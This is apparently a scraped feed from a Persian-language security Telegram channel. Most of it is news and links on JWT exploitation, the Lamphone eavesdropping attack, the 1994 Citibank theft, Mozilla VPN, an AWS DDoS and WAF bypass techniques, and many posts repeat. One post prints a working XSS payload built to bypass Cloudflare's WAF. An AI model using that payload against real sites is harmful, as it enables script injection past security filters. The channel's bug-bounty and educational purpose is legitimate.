اکسپلویت کردن JWT
سطح: مقدماتی
https://medium.com/@barrymalone/json-web-tokens-beginner-exploitation-5a44f8f6efff
#jwt
#api
#pentest
@sec_nerd
سطح: مقدماتی
https://medium.com/@barrymalone/json-web-tokens-beginner-exploitation-5a44f8f6efff
#jwt
#api
#pentest
@sec_nerd
در طی یک تحقیق دانشگاهی، اخیرا محققان اعلام کردند که میتوان از اثر ارتعاشات صوتی بر روی نور لامپ های درون ساختمان، مکالمات افراد حاضر در محیط را با روش های مهندسی معکوس بدست آورد!
در این روش با استفاده از تلسکوپ و یک لنز الکترو اوپتیکال میتوان تغییرات انتشار نور لامپ را که توسط صداهای اطراف ایجاد میشود دریافت و آنها را به صدای اصلی برگرداند.
این روش Lamphone نام دارد
لینک مقاله:
https://ad447342-c927-414a-bbae-d287bde39ced.filesusr.com/ugd/a53494_443addc922e048d89a664c2423bf43fd.pdf
خلاصه توضیحات به همراه ویدئو:
https://www.zdnet.com/article/lamphone-attack-lets-threat-actors-recover-conversations-from-your-light-bulb/
#news
#surveillance
@sec_nerd
در این روش با استفاده از تلسکوپ و یک لنز الکترو اوپتیکال میتوان تغییرات انتشار نور لامپ را که توسط صداهای اطراف ایجاد میشود دریافت و آنها را به صدای اصلی برگرداند.
این روش Lamphone نام دارد
لینک مقاله:
https://ad447342-c927-414a-bbae-d287bde39ced.filesusr.com/ugd/a53494_443addc922e048d89a664c2423bf43fd.pdf
خلاصه توضیحات به همراه ویدئو:
https://www.zdnet.com/article/lamphone-attack-lets-threat-actors-recover-conversations-from-your-light-bulb/
#news
#surveillance
@sec_nerd
در چنین روزی در سال 1994 یک گروه هکری روس با هدایت فردی به نام ولادیمیر لِوین توانست 10.7 میلیون دلار از Citibank سرقت کند.
در آن زمان از شبکه های X.25 استفاده میشد.
این نخستین سرقت از بانک با روشهای هک شبکه بود.
لوین در سال 1995 در لندن دستگیر و برای تحمل حبس سه ساله در سال 1998 به امریکا تحویل داده شد.
#history
@sec_nerd
در آن زمان از شبکه های X.25 استفاده میشد.
این نخستین سرقت از بانک با روشهای هک شبکه بود.
لوین در سال 1995 در لندن دستگیر و برای تحمل حبس سه ساله در سال 1998 به امریکا تحویل داده شد.
#history
@sec_nerd
Cloudlflare XSS WAF bypass
<script>
https://window.name=`<img src=x onerror=alert(top.document.domain)>`
location=`https://domain/?xss=<iframe src=javascript:src=https://top.name>x</iframe>`
</script>
#xss #cf #bugbounty
@sec_nerd
<script>
https://window.name=`<img src=x onerror=alert(top.document.domain)>`
location=`https://domain/?xss=<iframe src=javascript:src=https://top.name>x</iframe>`
</script>
#xss #cf #bugbounty
@sec_nerd
X (formerly Twitter)
Dave Vieira-Kurz (@secalert) on X
🇧🇷 Full-time Security Ninja since 2007. I have Shuriken throwing stars in my tool chain. 🇩🇪
TBHMv4 Recon.pdf
12.2 MB
موزیلا اعلام کرد طی هفته های آینده Mozilla VPN را عرضه خواهد کرد
پیش از این در سال ۲۰۱۹ Firefox Private Networks VPN در ایالات متحده بصورت آزمایشی عرضه شد که در نسخه ی نهایی و جهانی با تغییر نگرش و ساختار به Mozilla VPN تبدیل شده است و میتواند خارج از محیط مرورگر فایرفاکس، عمل روتینگ را در سیستم عامل و سایر مرورگرها نیز صورت دهد.
این وی پی ان از وایرگارد استفاده میکند.نسخه پیشین این طرح از کلودفلر بهره میبرد.
این سرویس در امریکا با قیمت 4.99 دلار در ماه برای شروع ارائه خواهد شد.
اطلاعات بیشتر:
https://www.hackread.com/mozilla-vpn-firefox-private-network-vpn-coming/
#news #firefox
#vpn
@sec_nerd
پیش از این در سال ۲۰۱۹ Firefox Private Networks VPN در ایالات متحده بصورت آزمایشی عرضه شد که در نسخه ی نهایی و جهانی با تغییر نگرش و ساختار به Mozilla VPN تبدیل شده است و میتواند خارج از محیط مرورگر فایرفاکس، عمل روتینگ را در سیستم عامل و سایر مرورگرها نیز صورت دهد.
این وی پی ان از وایرگارد استفاده میکند.نسخه پیشین این طرح از کلودفلر بهره میبرد.
این سرویس در امریکا با قیمت 4.99 دلار در ماه برای شروع ارائه خواهد شد.
اطلاعات بیشتر:
https://www.hackread.com/mozilla-vpn-firefox-private-network-vpn-coming/
#news #firefox
#vpn
@sec_nerd
HackRead | Latest Cyber Crime - InfoSec- Tech - Hacking News
Mozilla VPN - Firefox private network VPN is finally arriving
Like us on Facebook @ /HackRead
راهکار دیگری برای شناسایی و جمع آوری اطلاعات از اهداف برای نفوذگران
https://www.offensity.com/de/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/
#recon
#bugbounty
#pentest
@sec_nerd
https://www.offensity.com/de/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/
#recon
#bugbounty
#pentest
@sec_nerd
آمازون اعلام کرد در اواسط ماه فوریه بزرگترین حمله ی دیداس را تجربه کرده است.
این حمله با سرعت 2.3 ترابیت بر ثانیه انجام شده و سه روز طول کشیده است و توسط AWS Shield کنترل شده .
هدف عاملان این حمله هنوز مشخص نیست.
https://www.hackread.com/aws-largest-ever-ddos-attack-of-2-3-tbps/
#news
#amazon
#aws
#ddos
@sec_nerd
این حمله با سرعت 2.3 ترابیت بر ثانیه انجام شده و سه روز طول کشیده است و توسط AWS Shield کنترل شده .
هدف عاملان این حمله هنوز مشخص نیست.
https://www.hackread.com/aws-largest-ever-ddos-attack-of-2-3-tbps/
#news
#amazon
#aws
#ddos
@sec_nerd
Hackread
AWS suffers largest ever DDoS attack of 2.3 TBPS
Like us on Facebook @ /HackRead
appseceuwafbypass-copy-180706154120(1).pdf
1.6 MB
دور زدن WAF با روش HTTP encoding
برای دات نت:
https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/
ابزار:
https://github.com/irsdl/httpninja
افزونه ی burp:
https://github.com/nccgroup/BurpSuiteHTTPSmuggler/
#waf
#bypass
#pentest
@sec_nerd
برای دات نت:
https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/
ابزار:
https://github.com/irsdl/httpninja
افزونه ی burp:
https://github.com/nccgroup/BurpSuiteHTTPSmuggler/
#waf
#bypass
#pentest
@sec_nerd